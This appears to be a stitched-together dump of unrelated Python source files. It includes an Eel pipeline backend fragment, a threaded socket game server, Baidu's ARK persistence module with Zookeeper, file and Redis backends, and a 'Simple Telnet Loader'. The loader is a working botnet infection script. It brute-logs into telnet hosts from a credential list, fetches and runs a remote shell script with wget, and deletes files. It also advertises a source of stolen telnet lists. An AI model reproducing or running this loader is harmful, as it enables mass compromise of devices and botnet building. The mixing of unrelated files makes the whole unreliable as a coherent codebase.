#simply delete all data related to the old modules
global modulesById
global modulesByExecutionKey
global session
global fileLoader
global pipelineParams
global moduleConnector
pipelineParams = pipelineParamsByModuleID
modulesById = {}
modulesByExecutionKey = {}
session = SessionData()
moduleConnector = getModuleConnector()
fileLoader = FileLoader(session, moduleConnector)
print('[EEL] New Pipeline loaded %s'%pipelineID)
return True
# Central function for running a step with its respective parameters
# Parameters are defined in the JS definition of module. Module will be instantiated if it has not been created yet.
@eel.expose
def runStep(moduleName: str, moduleID: str, action:str, params: Dict[str, str], inputs: List[str], outputs: List[str]):
m: ModuleBase = getModule(moduleID, moduleName)
if log:
inputsStr = ', '.join(inputs) if inputs is not None else '-'
outputsStr = ', '.join(outputs) if inputs is not None else '-'
print('[Eel]: Running action: %s on %s(%s) with inputs: [%s] -> [%s]' % ( action, moduleID, moduleName, inputsStr,outputsStr))
res = m.run(action, params, inputs, outputs)
return res
# Async version of runStep.
# Will get a key that is used as an identifier for the thread.
# JS can send a termination signal with that key to stop the execution and it will get a callback with that key when execution is completed.
@eel.expose
def runStepAsync(threadID, moduleName: str, moduleID: str, action:str, params: Dict[str, str], inputs: List[str], outputs: List[str]):
m: ModuleBase = getModule(moduleID, moduleName)
if log:
inputsStr = ', '.join(inputs) if inputs is not None else '-'
outputsStr = ', '.join(outputs) if inputs is not None else '-'
print('[Eel]: Async Running %s(%s) with inputs: [%s] -> [%s]' % ( moduleID, moduleName, inputsStr,outputsStr))
#start execution in a separate thread
modulesByExecutionKey[threadID] = m
tmp = threading.Thread(target=startThreadInModule, args = (m,threadID,[action, params, inputs,outputs]) )
tmp.start()
# eel.spawn(startThreadInModule, m, threadID, [action, params, inputs,outputs])
@eel.expose
def abortStep(execKey:str):
if execKey in modulesByExecutionKey:
m = modulesByExecutionKey[execKey]
m.abort()
print("[Eel]: Sent Abort signal to module %s in thread %s"%(m.id,execKey))
else:
print("[Eel]: Ignoring abort signal for thread %s, since it can't be found."%(execKey)) |
client_models.py | import threading
import socket
import time
from lib.protocol import Protocol
from lib.console import Console
class ClientHandler:
def __init__(self, id_counter, conf, lock):
self.clients = []
self.id_counter = id_counter
self.conf = conf
self._lock = lock
self.console = Console(self, self._lock)
self.banned_clients = []
self.address = (socket.gethostbyname(self.conf.get_host()),
self.conf.get_port())
self.tickrate = self.conf.get_tickrate()
self.socket = socket.socket()
self.init_distributer()
def reset_id_counter(self):
self.id_counter = 0
def get_server_socket(self):
return self.socket
def get_console(self):
return self.console
def ban_client(self, ip):
if ip not in self.banned_clients:
self.banned_clients.append(ip)
def unban_client(self, ip):
if ip in self.banned_clients:
self.banned_clients.remove(ip)
def init_distributer(self):
self.distributer = Distributer(self.clients, self._lock,
self.tickrate, self)
client_thread = threading.Thread(target=self.distributer.distribute)
client_thread.daemon = True
client_thread.start()
def handle(self):
self.socket.bind(self.address)
self.socket.listen(5)
while True:
# Accept connections and add clients to clients list
conn, addr = self.socket.accept()
self.console.stdout("Client connected from %s:%s" %
(addr[0], str(addr[1])))
self.id_counter += 1
client = Client(conn, addr[0], addr[1], self.id_counter, self._lock)
if client.get_ip() not in self.banned_clients:
client.sendall(Protocol().get_hello_msg(self.tickrate,
client.get_id()))
self.clients.append(client)
client_listen_thread = threading.Thread(target=self._listen,
args=[client])
client_listen_thread.daemon = True
client_listen_thread.start()
def _listen(self, client):
while True:
try:
if client.get_ip() in self.banned_clients:
raise Exception
client.recv()
except Exception as e:
self.console.stdout(
"Client {}:{} has been disconnected.".format(
client.get_ip(),client.get_port()))
self.clients.remove(client)
break
class Client:
def __init__(self, socket, ip, port, client_id, lock):
self.socket = socket
self.ip = ip
self.port = port
self.id = client_id
self._lock = lock
self.latest_data = ""
def sendall(self, data):
try:
self.socket.sendall(data)
except:
pass
def recv(self):
data = str(self.socket.recv(4096), "Latin-1")
self.latest_data = data.split(Protocol().get_end_tag())[-2]
def get_socket(self):
return self.socket
def get_id(self):
return self.id
def get_ip(self):
return self.ip
def get_port(self):
return self.port
def get_latest_data(self):
return self.latest_data
class Distributer:
def __init__(self, clients, lock, tickrate, client_hdl):
self.clients = clients
self._lock = lock
self.tickrate = tickrate
self.client_hdl = client_hdl
self.console = self.client_hdl.get_console()
def tick(self, loop_time):
t = 1 / self.tickrate - loop_time
if t < 0:
self.console.stdout("server warning : cannot keep up with tickrate!")
else:
time.sleep(t)
def _get_data_list(self):
# Get latest data from all clients and delete empty strings if present
all_latest_data = list(map(lambda c: c.get_latest_data(), self.clients))
return list(filter(("").__ne__, all_latest_data))
def distribute(self):
while True:
begin = time.time()
data_list = self._get_data_list()
data_to_send = "".join(data_list)
for client in self.clients:
client_send_thread = threading.Thread(
target=client.sendall,
args=[Protocol().get_data_msg(data_to_send)])
client_send_thread.daemon = True
client_send_thread.start()
# If server is empty
if len(self.clients) == 0:
self.client_hdl.reset_id_counter()
self.tick(time.time() - begin)
|
loader.py | #!/usr/bin/python
# Simple Telnet Loader Modified by Deeznuts?
# You Can Find Fresh TELNET List To Load @ http://godz56.tk/telnet-list/
# Modified with more tweaks.
import sys, re, os, socket, time
from threading import Thread
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; rm -rf *" #command to send
info = open(str(sys.argv[1]),'a+')
def sqwad(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(5)
tn.connect((ip,23))
except Exception:
print "\033[32m[\033[31m+\033[32m] \033[31mFailed To Connect!\033[37m %s"%(ip)
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
print "\033[32m[\033[31m+\033[32m] \033[35mSending Username!\033[37m %s"%(ip)
time.sleep(0.09)
else:
pass
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
print "\033[32m[\033[33m+\033[32m] \033[36mSending Password!\033[37m %s"%(ip)
time.sleep(2)
else:
pass
except Exception:
tn.close()
try:
tn.send("sh" + "\n")
time.sleep(0.05)
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[32mCommand Sent!\033[37m %s"%(ip) #False possitives because thats what yall wanted lmao
time.sleep(15)
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Thread(target=sqwad, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass |
persistence.py | # -*- coding: UTF-8 -*-
################################################################################
#
# Copyright (c) 2018 Baidu.com, Inc. All Rights Reserved
#
################################################################################
"""
**persistence** 模块用于配置信息、状态信息的持久化存储。
"""
import os
import json
import time
import copy
import string
import ark.are.common as common
import ark.are.exception as exception
import ark.are.log as log
import ark.are.config as config
class PersistenceEvent(object):
"""
提供持久化事件通知支持
"""
class PersistState(object):
SUSPENDED = "SUSPENDED"
CONNECTED = "CONNECTED"
LOST = "LOST"
class EventType(object):
CREATED = 'CREATED'
DELETED = 'DELETED'
CHANGED = 'CHANGED'
CHILD = 'CHILD'
NONE = 'NONE'
def __init__(self, type=None, state=None, path=None):
self.type = type or PersistenceEvent.EventType.NONE
self.state = state or PersistenceEvent.PersistState.LOST
self.path = path or ""
class BasePersistence(common.Singleton):
"""
持久化基类,提供标准化的持久化接口,以及单例等基本功能。
.. Note:: 持久化功能以树型层级结构的节点存储数据,节点可以以路径形式索引。
"""
PERSIST_MODE_NAME = "PERSIST_MODE"
PERSIST_INTERVAL_NAME = "PERSIST_INTERVAL"
PERSIST_TIMEOUT_NAME = "PERSIST_TIMEOUT"
PERSIST_PARAMETERS_NAME = "PERSIST_PARAMETERS"
def get_data(self, path):
"""
获得指定路径path的节点数据
:param str path: 数据存储路径
:return: 节点数据
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def save_data(self, path, data):
"""
存储数据data到特定的path路径节点
:param str path: 数据存储路径
:param str data: 待存储的数据
:return: 无返回
:rtype: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def delete_node(self, path, force=False):
"""
删除node节点
:param str path: 数据存储路径
:param bool force: 是否强行删除而不判断节点有效性
:return: 无返回
:rtype: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def get_children(self, path, watcher=None, include_data=False):
"""
获取所有子节点
:param str path: 待获取子节点的路径
:param watcher: 状态监听函数。函数形参为(event),event包括三个成员属性:path(发生状态变化的路径)、state(server链接状态)、type(事件类型,包括CREATED|DELETED|CHANGED|CHILD|NONE)
:param bool include_data: 是否同时返回数据
:return: 子节点名字列表
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def create_node(self, path, value="",
ephemeral=False, sequence=False, makepath=False):
"""
根据节点各属性创建节点
:param str path: 待创建的节点路径
:param str value: 待存数据
:param bool ephemeral: 是否是临时节点
:param bool sequence: 是否是自动分配节点序号
:param bool makepath: 是否创建父节点
:return: 新创建的节点路径
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def exists(self, path):
"""
查询制定path路径的节点是否存在
:param str path: 待检查的节点路径
:return: True表示节点存在,False表示节点不存在
:rtype: bool
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def add_listener(self, watcher):
"""
监听会话状态
:param watcher: 状态监听函数。函数形参为(state),可能的取值包括"SUSPENDED"、"CONNECTED"、"LOST"
:return: 无返回
:rtype: None
:raises: exception.EPIOError IO异常
"""
raise exception.ENotImplement("function is not implement")
def disconnect(self):
"""
主动断开持久化请求
:return: 无返回
:rtype: None
"""
raise exception.ENotImplement("function is not implement")
class PlainPersistence(BasePersistence):
"""
通过通用存储(文件、redis等)实现的持久化类基类。主要用来完成基础的轮询刷新时间、比对节点状态触发事件的功能。
实体节点的数据存放在.data子节点中。临时节点序号存放在.sequence中。临时节点会被定期touch以保持其最新,超时的会被自动删除。
"""
_init = False
def __init__(self):
"""
初始化方法
"""
import threading
if self._init:
return
self._initf()
self._lock = threading.Lock()
self._inspect_results = {}
self._ob_paths = {} # 需要观察路径下节点变化的路径列表
self._touch_paths = {} # 针对临时节点,需要不断touch的路径列表
self._interval = string.atof(config.GuardianConfig.get(self.PERSIST_INTERVAL_NAME, "0.4"))
self._timeout = string.atof(config.GuardianConfig.get(self.PERSIST_TIMEOUT_NAME, "3"))
self._session_thread = threading.Thread(target=self._thread_run)
self._init = True
self._session_thread.setDaemon(True)
self._session_thread.start()
def __del__(self):
"""
析构方法,完成线程回收
"""
self.disconnect()
def delete_node(self, path, force=False):
"""
删除node节点
:param str path: 数据存储路径
:param bool force: 是否强行删除而不判断节点有效性
:return: 无返回
:rtype: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
self._del_record_when_delnode(path)
self._del_node(path, force)
log.d("delete node success, path:{path}".format(path=path))
def get_children(self, path, watcher=None, include_data=False):
"""
获取所有子节点
:param str path: 待获取子节点的路径
:param watcher: 状态监听函数。函数形参为(event),event是一个对象,包括三个成员属性:path(发生状态变化的路径)、state(server链接状态)、type(事件类型,包括CREATED|DELETED|CHANGED|CHILD|NONE)
:param bool include_data: 是否同时返回数据
:return: 子节点名字列表
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
chd = self._valid_chd(path, include_data)
if not include_data:
node_list = chd.keys()
else:
node_list = chd.items()
if watcher:
if not callable(watcher):
raise exception.ETypeMismatch("watcher must callable")
self._new_ob(path, watcher)
return node_list
def disconnect(self):
"""
主动断开持久化请求
:return: 无返回
:rtype: None
"""
self._init = False
with self._lock:
self._ob_paths = {}
self._touch_paths = {}
log.d("disconnect success")
def _initf(self):
"""
用于子类初始化
:return:
"""
raise exception.ENotImplement("function is not implement")
def _del_node(self, path, force):
"""
用于子类删除节点
:return:
"""
raise exception.ENotImplement("function is not implement")
def _valid_chd(self, path, include_data=False):
"""
用于获取有效的子节点
:return:
"""
raise exception.ENotImplement("function is not implement")
def _valid_node(self, path):
"""
用于获取有效的节点数据
:return:
"""
raise exception.ENotImplement("function is not implement")
def _refresh(self, obpath):
"""
刷新节点属性
"""
result = {"exist": False, "md5": None, "children": {}}
return result
def _touch(self, tp, now):
"""
更新临时节点的时间,并清理已经过期的临时节点
"""
raise exception.ENotImplement("function is not implement")
def _inspect(self, obpath, watcher):
"""
检查节点是否有变化,如果有则触发wather函数
"""
result = self._refresh(obpath)
if obpath not in self._inspect_results:
self._inspect_results[obpath] = result
last_result = {"exist": False, "md5": None, "children": {}}
else:
last_result = self._inspect_results[obpath]
# 判断目录状态是否有变化。
if last_result["exist"] != result["exist"]:
if result["exist"]:
# 事实上,以现在已经提供出的接口参数,并不会产生CREATED事件。如果路径不存在,get_children会直接抛出异常
watcher(PersistenceEvent(type=PersistenceEvent.EventType.CREATED,
state=PersistenceEvent.PersistState.CONNECTED,
path=obpath))
else:
watcher(PersistenceEvent(type=PersistenceEvent.EventType.DELETED,
state=PersistenceEvent.PersistState.CONNECTED,
path=obpath))
self._ignore(obpath)
return
# 判断data是否变化
if last_result["md5"] != result["md5"]:
watcher(PersistenceEvent(type=PersistenceEvent.EventType.CHANGED,
state=PersistenceEvent.PersistState.CONNECTED,
path=obpath))
self._ignore(obpath)
return
last_result.keys()
# 判断子节点是否有变化
if len(last_result["children"]) != len(result["children"]) or\
len(set(last_result["children"].keys()) - set(result["children"].keys())) != 0:
watcher(PersistenceEvent(type=PersistenceEvent.EventType.CHILD,
state=PersistenceEvent.PersistState.CONNECTED,
path=obpath))
self._ignore(obpath)
return
return
def _ignore(self, obpath):
"""
清理需要监视的路径
"""
self._del_ob(obpath)
def _thread_run(self):
"""
获取路径变化的事件,并保持临时节点的时间为最新
"""
while self._init:
with self._lock:
ob_paths = copy.copy(self._ob_paths)
touch_paths = copy.copy(self._touch_paths)
now = long(time.time())
for tp in touch_paths:
self._touch(tp, now)
for obp, watcher in ob_paths.iteritems():
self._inspect(obp, watcher)
time.sleep(self._interval)
def _new_touch(self, path):
"""
增加一个touch的路径
"""
with self._lock:
if not self._init:
return
self._touch_paths[path] = ""
def _new_ob(self, path, watcher):
"""
增加一个检测的路径
"""
with self._lock:
if not self._init:
return
self._ob_paths[path] = watcher
def _del_touch(self, path):
"""
增加一个touch的路径
"""
with self._lock:
self._touch_paths.pop(path)
def _del_ob(self, path):
"""
增加一个检测的路径
"""
with self._lock:
self._ob_paths.pop(path)
self._inspect_results.pop(path)
return
def _del_record_when_delnode(self, path):
"""
当路径不存在时清理与该路径相关的记录
"""
with self._lock:
for k in list(self._touch_paths):
if k.startswith(path):
self._touch_paths.pop(k)
for k in list(self._ob_paths):
if k.startswith(path):
self._ob_paths.pop(k)
self._inspect_results.pop(path)
PersistenceDriver = BasePersistence
class ZkPersistence(BasePersistence):
"""
Zookeeper持久化实现,封装对zookeeper的操作,包括对zookeeper节点的增删改查
用于智能运维机器人运行时数据的持久化和异常恢复
"""
_init = False
def __init__(self):
"""
初始化方法
"""
if ZkPersistence._init:
return
self._client = ZkPersistence._new_session()
self._client.start()
ZkPersistence._init = True
@classmethod
def _run_catch(cls, func):
"""
执行func并捕获异常,将kazoo异常转换为对应的异常对象
"""
import kazoo
try:
return func()
except kazoo.exceptions.NoNodeError:
raise exception.EPNoNodeError()
except kazoo.exceptions.ZookeeperError:
log.f("zk fail")
raise exception.EPServerError()
except Exception as e:
log.r(exception.EPIOError(), "Requesst I/O Error")
@classmethod
def _new_session(cls):
"""
创建kazoo.client.KazooClient实例
:return: kazoo.client.KazooClient实例
:rtype: kazoo.client.KazooClient
:raises: exception.EPConnectTimeout 连接超时异常
"""
# 仅在必要的情况下才引入kazoo
from kazoo import client
hosts = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
params = json.loads(config.GuardianConfig.get(cls.PERSIST_PARAMETERS_NAME, '{}'))
return ZkPersistence._run_catch(lambda: (client.KazooClient(hosts=hosts, **params)))
def get_data(self, path):
"""
获得指定路径path的节点数据
:param str path: 数据存储路径
:return: 节点数据
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError 连接异常
"""
return ZkPersistence._run_catch(lambda: (self._client.get(path)[0]))
def save_data(self, path, data):
"""
存储数据data到特定的path路径节点
:param str path: 数据存储路径
:param str data: 待存储的数据
:return: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError 连接异常
"""
ZkPersistence._run_catch(lambda: (self._client.set(path, data)))
log.d("save data success, path:{path}, data:{data}".format(path=path, data=data))
def delete_node(self, path, force=False):
"""
删除node节点
:param str path: 数据存储路径
:param bool force: 是否强行删除而不判断节点有效性
:return None
"""
if force:
self._client.delete(path=path, recursive=True)
else:
self._run_catch(lambda: (self._client.delete(path=path, recursive=True)))
log.d("delete node success, path:{path}".format(path=path))
def get_children(self, path, watcher=None, include_data=False):
"""
获取所有子节点
:param str path: 待获取子节点的路径
:param watcher: 状态监听函数。函数形参为(event),event是一个对象,包括三个成员属性:path(发生状态变化的路径)、state(server链接状态)、type(事件类型,包括CREATED|DELETED|CHANGED|CHILD|NONE)
:param bool include_data: 是否同时返回数据
:return: 子节点名字列表
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
# 装饰watcher,将state、type转换为ARK内定义
def dec(zkevent):
if zkevent.state == "CONNECTED" or zkevent.state == "CONNECTED_RO":
state = PersistenceEvent.PersistState.CONNECTED
elif zkevent.state == "CONNECTING":
state = PersistenceEvent.PersistState.SUSPENDED
else:
state = PersistenceEvent.PersistState.LOST
event = PersistenceEvent(zkevent.type, state, zkevent.path)
return watcher(event)
return ZkPersistence._run_catch(
lambda: (self._client.get_children(path, watcher and dec, include_data)))
def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
"""
根据节点各属性创建节点
:param str path: 节点路径
:param str value: 待存数据
:param bool ephemeral: 是否是临时节点
:param bool sequence: 是否是顺序节点
:param bool makepath: 是否创建父节点
:return: 新创建的节点路径
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
node_path = ZkPersistence._run_catch(lambda: (self._client.create(path, value, None,
ephemeral, sequence,
makepath)))
log.d("create node success, path:{path}, value:{value}, ephemeral:"
"{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
path=node_path, value=value,
ephemeral=ephemeral, sequence=sequence,
makepath=makepath))
return node_path
def exists(self, path):
"""
查询制定path路径的节点是否存在
:param str path: 节点路径
:return: True或False
:rtype: bool
:raises: exception.EPIOError IO异常
"""
return ZkPersistence._run_catch(lambda: (self._client.exists(path)))
def add_listener(self, watcher):
"""
监听会话状态
:param watcher: 状态监听函数。函数形参为(state),可能的取值包括"SUSPENDED"、"CONNECTED"、"LOST"
:return: 无返回
:rtype: None
:raises: exception.EPIOError IO异常
"""
# 装饰watcher,将state、type转换为ARK内定义
def dec(zkstate):
state = zkstate
return watcher(state)
ZkPersistence._run_catch(lambda: (self._client.add_listener(watcher and dec)))
log.d("add listener success")
def disconnect(self):
"""
主动断开持久化请求
:return: 无返回
:rtype: None
"""
ZkPersistence._run_catch(lambda: (self._client.close()))
log.d("disconnect success")
class FilePersistence(PlainPersistence):
"""
通过文件系统实现的持久化类。
实体节点用文件系统中的目录表示,实体节点的数据存放在目录下的.data文件中。
临时节点用文件系统中的文件来表示,临时节点的数据存放在对应文件中,临时节点(文件)会被定期touch以保持其最新,超时的节点会在列出或获取数据时校验并删除。
"""
_file_mode = "0755"
def _initf(self):
"""
用于子类初始化
:return:
"""
self._base = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
self._mode = string.atoi(config.GuardianConfig.get(self.PERSIST_MODE_NAME, self._file_mode), 8)
if not os.path.exists(self._base):
os.makedirs(self._base, self._mode)
def _del_node(self, path, force):
"""
删除node节点
:param str path: 数据存储路径
:return None
"""
ospath = self._base + path
def _delall():
"""
:return:
"""
if os.path.isdir(ospath):
import shutil
shutil.rmtree(ospath, True)
else:
os.remove(ospath)
if force:
_delall()
else:
self._run_catch(_delall, path)
def _touch(self, tp, now):
"""
更新临时节点的时间,并清理已经过期的临时节点
"""
ospath = self._base + tp
if not os.path.exists(ospath) or not os.path.isfile(ospath):
self._del_record_when_delnode(tp)
return
# 更新临时节点时间
os.utime(ospath, None)
def _valid_chd(self, path, include_data=False):
"""
获取所有子节点,并校验子节点是否有效。默认不获取子节点数据
"""
def _valid():
valid_time = time.time() - self._timeout
ospath = self._base + path
result = {}
for node_name in os.listdir(ospath):
if node_name == ".data" or node_name == ".sequence":
continue
file_name = "/".join([ospath, node_name])
node_name = "/".join([path, node_name])
if os.path.isfile(file_name):
mtime = os.stat(file_name).st_mtime
if mtime < valid_time:
self.delete_node(node_name, True)
continue
if not include_data:
result[node_name] = ""
else:
data = self.get_data(node_name)
result[node_name] = data
return result
return self._run_catch(_valid, path, True)
def _refresh(self, path):
"""
刷新节点属性
"""
obpath = self._base + path
result = {}
# 获取该路径所有状态
if self.exists(path):
result["exist"] = True
# 获取该路径数据
import hashlib
data = self.get_data(path)
md5 = hashlib.md5()
md5.update(data)
result["md5"] = md5.hexdigest()
# 获取所有子节点,去除两个内置文件
result["children"] = set([name for name in os.listdir(obpath)])
if ".data" in result["children"]:
result["children"].remove(".data")
if ".sequence" in result["children"]:
result["children"].remove(".sequence")
else:
result["exist"] = False
result["md5"] = None
result["children"] = {}
return result
def _run_catch(self, func, path, path_is_dir=False):
"""
执行func并捕获异常,将文件系统异常转换为对应的异常对象
"""
ospath = self._base + path
try:
if os.path.exists(ospath):
if path_is_dir:
if os.path.isdir(ospath):
return func()
else:
if os.path.isfile(ospath):
# 判断文件是否过期,过期直接报错
mtime = os.stat(ospath).st_mtime
if mtime < time.time() - self._timeout:
self.delete_node(path, True)
else:
return func()
else:
return func()
raise exception.EPNoNodeError()
except exception.EPNoNodeError as e:
log.r(e, "Node not exist:{}".format(path))
except Exception as e:
log.r(exception.EPIOError(), "Request I/O Error")
def get_data(self, path):
"""
获得指定路径path的节点数据
:param str path: 数据存储路径
:return: 节点数据
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
ospath = self._base + path
def _readdata():
if os.path.isdir(ospath):
file_path = "/".join((ospath, ".data"))
else:
file_path = ospath
if not os.path.exists(file_path):
return ""
with open(file_path, 'r') as f:
return f.read()
return self._run_catch(_readdata, path)
def save_data(self, path, data):
"""
存储数据data到特定的path路径节点
:param str path: 数据存储路径
:param str data: 待存储的数据
:return: 无返回
:rtype: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
ospath = self._base + path
def _writedata():
if os.path.isdir(ospath):
file_path = "/".join((ospath, ".data"))
else:
file_path = ospath
with open(file_path, 'w') as f:
return f.write(data)
self._run_catch(_writedata, path)
log.d("save data success, path:{path}".format(path=path))
@classmethod
def _seq_file_name(cls, ospath, value):
"""
生成临时节点的序列号并写入数据。最大序列号会被记录在.sequence文件中。以避免前后多次运行使用同一序列号。序列号生成的过程通过文件锁保证事务
"""
import re
import fcntl
dirname = os.path.dirname(ospath)
basename = os.path.basename(ospath)
max_sn = -1
with open("/".join((dirname, ".sequence")), 'a+') as f:
f.seek(0)
try:
max_sn = string.atoi("0" + f.read(11))
except ValueError:
pass
# 加文件锁,保证序列id自增的唯一性
fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
try:
# 检测目录中的文件,如果文件名(或目录名)前缀匹配,则检查后缀是否全为数字序号。记录下最大的数字序号
for name in os.listdir(dirname):
if name == ".data" or name == ".sequence":
continue
if len(name) < len(basename) or name[0:len(basename)] != basename:
continue
sn = name[len(basename):]
if not re.match("[0-9]+$", sn):
continue
sn = string.atoi(sn)
if sn > max_sn:
max_sn = sn
# 生成新的临时节点名(比最大的数字序号还大1)
f.seek(0)
f.truncate()
f.write("%d" % (max_sn + 1))
file_path = ospath + ("%09d" % (max_sn + 1))
with open(file_path, 'w') as node:
node.write(value)
finally:
fcntl.flock(f, fcntl.LOCK_UN)
return ospath + ("%09d" % (max_sn + 1))
def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
"""
根据节点各属性创建节点
:param str path: 节点路径
:param str value: 待存数据
:param bool ephemeral: 是否是临时节点
:param bool sequence: 是否是顺序节点
:param bool makepath: 是否创建父节点
:return: 新创建的节点路径
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
ospath = self._base + path
try:
if ephemeral:
# 临时节点,直接用文件来表示
dirname = os.path.dirname(ospath)
if not os.path.exists(dirname):
if makepath:
os.makedirs(dirname, self._mode)
else:
raise exception.EPNoNodeError
file_path = ospath
if sequence:
file_path = self._seq_file_name(ospath, value)
else:
with open(file_path, 'w') as f:
f.write(value)
self._new_touch(file_path[len(self._base):])
else:
# 实体节点,用目录来表示,数据存放在目录下的.data文件中
if not os.path.exists(ospath):
if not os.path.exists(os.path.dirname(ospath)) and not makepath:
raise exception.EPNoNodeError
os.makedirs(ospath, self._mode)
file_path = "/".join((ospath, ".data"))
with open(file_path, 'w') as f:
f.write(value)
node_path = file_path[len(self._base):]
except exception.EPNoNodeError as e:
log.r(e, "Node not exist:{}".format(os.path.dirname(path)))
except Exception as e:
log.r(exception.EPIOError(), "Request I/O Error")
log.d("create node success, path:{path}, value:{value}, ephemeral:"
"{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
path=node_path, value=value,
ephemeral=ephemeral, sequence=sequence,
makepath=makepath))
return node_path
def exists(self, path):
"""
查询制定path路径的节点是否存在
:param str path: 节点路径
:return: True或False
:rtype: bool
"""
ospath = self._base + path
return os.path.exists(ospath)
def add_listener(self, watcher):
"""
监听会话状态
:param watcher: 状态监听函数。函数形参为(state),可能的取值包括"SUSPENDED"、"CONNECTED"、"LOST"
:return: 无返回
:rtype: None
"""
log.i("nothing to do in FilePersistence.add_listener()")
class RedisPersistence(PlainPersistence):
"""
通过Redis实现的持久化类:
* 实体节点的 *节点路径* 以key形式存放。
* 临时节点与实体节点类似,但是临时节点会被定期更新有效期,超期会被redis自动删除。仅列出子节点时额外校验是否超时。
为了在部分不支持keys命令的Redis正常运行,节点管理采用了FilePersistence类似的方式:
1. 所有节点均为Hash(类似FilePersistence的目录)
2. 节点值存放在.data元素中(类似FilePersistence的.data隐藏文件)
3. Hash中其他的key(非.开头的)为当前节点的子节点名,value为空,子节点的值存放在子节点Hash的.data中
4. 生成临时节点序号的最大序号记录在.sequence元素中(类似FilePersistence的.sequence隐藏文件)
5. 创建节点需要同时修改父节点的Hash并创建新的key,所以通过lua脚本保证操作原子化
"""
def _initf(self):
"""
初始化方法
"""
self._handle = self._new_session()
self._load_scripts()
@classmethod
def _split_node_name(cls, node_path):
"""
将节点路径分解为父路径和节点名
:return: 节点的父路径和节点名
:rtype: (path, name)
"""
result = node_path.rsplit("/", 1)
if result[0] == "":
result[0] = "/"
return result[0], result[1]
@classmethod
def _new_session(cls):
"""
创建redis.client.Redis实例
:return: redis.client.Redis实例
:rtype: redis.client.Redis
:raises: exception.EPConnectTimeout 连接超时异常
"""
# 仅在必要的情况下才引入redis
import redis
redis_url = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
params = json.loads(config.GuardianConfig.get(cls.PERSIST_PARAMETERS_NAME, "{}"))
return RedisPersistence._run_catch(lambda: (redis.StrictRedis.from_url(redis_url, **params)))
def _load_scripts(self):
"""
加载lua脚本。包括创建节点和删除节点两个
"""
# 传入参数,KEYS[1]=父节点全路径,KEYS[2]=子节点名,ARGV[1]=节点数据,ARGV[2]=是否序号节点(0 or 1),ARGV[3]=到期时间(0表示永久)。返回-1表示错误
new_node_script = """
local node_name = KEYS[2]
local ret = redis.call('ttl', KEYS[1])
if ret ~= -1 then
return -1
end
if tostring(ARGV[2]) ~= "0" then
local seq = redis.call('hincrby', KEYS[1], '.sequence', '1')
node_name = string.format('%s%d', node_name, seq)
end
local expire_time = tonumber(ARGV[3])
local node_path = string.format('%s/%s', KEYS[1], node_name)
local ret = redis.call('hsetnx', KEYS[1], node_name, tostring(expire_time))
if ret ~= 1
then
return -2
end
ret = redis.call('hsetnx', node_path, '.data', ARGV[1])
if ret ~= 1
then
redis.call('hdel', KEYS[1], node_name)
return -3
end
if expire_time ~= 0 then
redis.call('expireat', node_path, expire_time)
end
return node_path
"""
# 传入参数,KEYS[1]=父节点全路径,KEYS[2]=子节点名。返回-1表示错误
delete_node_script = """
local node_path = string.format('%s/%s', KEYS[1], KEYS[2])
local ret = redis.call('hlen', node_path)
if ret == 0 then
redis.call('hdel', KEYS[1], KEYS[2])
redis.call('del', node_path)
return 1
elseif ret < 3
then
local result = redis.call('hgetall', node_path)
local fst_c = string.byte(result[1], 1)
if #result < 3 then
result[3] = '.'
end
local snd_c = string.byte(result[3], 1)
if ( fst_c == 46 and snd_c == 46 )
then
redis.call('hdel', KEYS[1], KEYS[2])
redis.call('del', node_path)
return 1
end
end
return -1
